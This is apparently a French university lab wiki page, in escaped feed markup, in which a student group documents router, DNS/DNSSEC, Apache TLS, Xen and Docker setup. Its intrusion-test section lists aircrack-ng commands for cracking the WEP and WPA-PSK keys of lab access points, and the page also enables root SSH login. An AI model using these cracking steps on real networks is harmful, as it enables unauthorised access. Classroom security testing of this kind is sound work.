  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
&lt;br /&gt;
 routerE304(config)#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée (plus bas).&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51987</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
